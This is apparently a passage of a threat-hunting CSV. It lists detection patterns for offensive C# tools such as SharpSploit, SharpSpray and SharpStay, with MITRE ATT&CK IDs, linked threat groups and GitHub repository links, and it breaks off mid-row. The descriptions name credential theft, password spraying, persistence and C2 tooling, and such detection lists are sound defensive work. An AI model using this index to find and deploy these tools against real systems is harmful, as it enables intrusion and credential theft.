"*SharpSploit Domain Enumeration Commands*",".{0,1000}SharpSploit\sDomain\sEnumeration\sCommands.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","59156"
"*SharpSploit Domain Enumeration Commands*",".{0,1000}SharpSploit\sDomain\sEnumeration\sCommands.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","59157"
"*SharpSploit Enumeration Commands*",".{0,1000}SharpSploit\sEnumeration\sCommands.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","59158"
"*SharpSploit Lateral Movement Commands*",".{0,1000}SharpSploit\sLateral\sMovement\sCommands.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","59159"
"*SharpSploit Service*",".{0,1000}SharpSploit\sService.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","59160"
"*SharpSploit*",".{0,1000}SharpSploit.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","59161"
"*SharpSploit.Credentials.*",".{0,1000}SharpSploit\.Credentials\..{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","59162"
"*SharpSploit.dll*",".{0,1000}SharpSploit\.dll.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","59163"
"*SharpSploit.Enumeration.*",".{0,1000}SharpSploit\.Enumeration\..{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","59164"
"*SharpSploit.Enumeration.*",".{0,1000}SharpSploit\.Enumeration\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","59165"
"*SharpSploit.Enumeration.*",".{0,1000}SharpSploit\.Enumeration\..{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","1","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","59166"
"*SharpSploit.Exe*",".{0,1000}SharpSploit\.Exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","59167"
"*SharpSploit.Exe*",".{0,1000}SharpSploit\.Exe.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","59168"
"*SharpSploit.Execution.*",".{0,1000}SharpSploit\.Execution\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","59169"
"*SharpSploit.Persistence.*",".{0,1000}SharpSploit\.Persistence\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","59170"
"*sharpSploitConsole.exe*",".{0,1000}sharpSploitConsole\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","59171"
"*sharpSploitConsole.exe*",".{0,1000}sharpSploitConsole\.exe.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","1","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","59172"
"*SharpSploitConsole.sln*",".{0,1000}SharpSploitConsole\.sln.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","1","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","59173"
"*SharpSploitConsole:>*",".{0,1000}SharpSploitConsole\:\>.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","59174"
"*SharpSploitConsole_x*",".{0,1000}SharpSploitConsole_x.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","N/A","10","10","279","57","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z","59175"
"*SharpSploitConsole_x64.exe*",".{0,1000}SharpSploitConsole_x64\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","59176"
"*SharpSploitConsole-master*",".{0,1000}SharpSploitConsole\-master.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","59177"
"*SharpSploitDomainRecon*",".{0,1000}SharpSploitDomainRecon.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59178"
"*SharpSploitDomainReconImpl*",".{0,1000}SharpSploitDomainReconImpl.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59179"
"*SharpSploitService.exe*",".{0,1000}SharpSploitService\.exe.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","59180"
"*SharpSploitSvc*",".{0,1000}SharpSploitSvc.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","59181"
"*SharpSplunkWhisperer2*",".{0,1000}SharpSplunkWhisperer2.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0004 - TA0003  - TA0008 - TA0011","N/A","N/A","C2","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","N/A","9","10","250","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z","59182"
"*SharpSpoolTrigger.exe*",".{0,1000}SharpSpoolTrigger\.exe.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0008 ","N/A","N/A","Lateral Movement","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","N/A","10","5","483","57","2024-05-15T21:24:56Z","2021-09-12T18:18:15Z","59183"
"*SharpSpray*",".{0,1000}SharpSpray.{0,1000}","offensive_tool_keyword","SharpSpray","This project is a C# port of my PowerSpray.ps1 script. SharpSpray a simple code set to perform a password spraying attack against all users of a domain using LDAP and is compatible with Cobalt Strike.","T1110 - T1558","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/jnqpblc/SharpSpray","1","1","N/A","N/A","N/A","2","195","36","2019-06-30T03:10:52Z","2019-03-04T17:14:07Z","59184"
"*SharpSpray.exe *",".{0,1000}SharpSpray\.exe\s.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","N/A","10","1","90","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z","59185"
"*SharpSpray.exe*",".{0,1000}SharpSpray\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59186"
"*SharpSpray\Program.cs*",".{0,1000}SharpSpray\\Program\.cs.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","59187"
"*SharpSQL by @mlcsec*",".{0,1000}SharpSQL\sby\s\@mlcsec.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","59188"
"*SharpSQL by @mlcsec*",".{0,1000}SharpSQL\sby\s\@mlcsec.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","59189"
"*SharpSQLPwn*",".{0,1000}SharpSQLPwn.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","59190"
"*SharpSQLPwn*",".{0,1000}SharpSQLPwn.{0,1000}","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lefayjey/SharpSQLPwn","1","1","N/A","N/A","N/A","2","111","20","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z","59191"
"*SharpSQLPwn.exe*",".{0,1000}SharpSQLPwn\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59192"
"*SharpSSDP.exe*",".{0,1000}SharpSSDP\.exe.{0,1000}","offensive_tool_keyword","SharpSSDP"," execute SharpSSDP.exe through Cobalt Strike's Beacon ""execute-assembly"" module to discover SSDP related services","T1046 - T1016","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/rvrsh3ll/SharpSSDP","1","1","N/A","N/A","7","1","17","4","2018-12-16T17:14:28Z","2018-12-16T17:14:12Z","59193"
"*SharpStay.csproj*",".{0,1000}SharpStay\.csproj.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","1","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","59194"
"*SharpStay.exe*",".{0,1000}SharpStay\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","59195"
"*SharpStay.exe*",".{0,1000}SharpStay\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59196"
"*Sharpstay.exe*",".{0,1000}Sharpstay\.exe\s.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","59197"
"*SharpStay.sln*",".{0,1000}SharpStay\.sln.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","1","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","59198"
"*SharpStay-master*",".{0,1000}SharpStay\-master.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","1","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","59199"
"*Sharp-Suite.git*",".{0,1000}Sharp\-Suite\.git.{0,1000}","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","59200"
"*SharpSvc.exe*",".{0,1000}SharpSvc\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59201"
"*SharpSword.csproj*",".{0,1000}SharpSword\.csproj.{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","N/A","8","10","117","11","2024-09-30T15:21:25Z","2021-07-15T14:50:05Z","59202"
"*SharpSword.exe*",".{0,1000}SharpSword\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Read the contents of DOCX files using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - 